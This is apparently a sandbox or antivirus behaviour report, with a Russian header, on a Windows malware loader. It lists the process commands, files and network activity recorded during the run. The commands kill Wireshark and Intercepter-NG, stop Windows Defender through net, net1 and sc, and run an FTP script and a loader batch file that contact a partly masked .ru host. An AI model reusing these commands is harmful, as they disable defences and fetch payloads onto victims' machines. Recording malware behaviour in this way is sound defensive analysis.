Техническая информация
- '<SYSTEM32>\taskkill.exe' /IM Intercepter-NG.exe /F
- '<SYSTEM32>\net1.exe' start schedule
- '<SYSTEM32>\ftp.exe' -s:"%PROGRAM_FILES%\load.txt"
- '<SYSTEM32>\taskkill.exe' /IM wireshark.exe /F
- '<SYSTEM32>\net.exe' stop windefend
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\loader.bat" "
- '<SYSTEM32>\sc.exe' stop windefend
- '<SYSTEM32>\net1.exe' stop windefend
- %PROGRAM_FILES%\load.txt
- %TEMP%\1.tmp\loader.bat
- %PROGRAM_FILES%\load.txt
- 'an##psy.ru':21
- 'localhost':1036
- DNS ASK an##psy.ru
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: '(null)' WindowName: '(null)'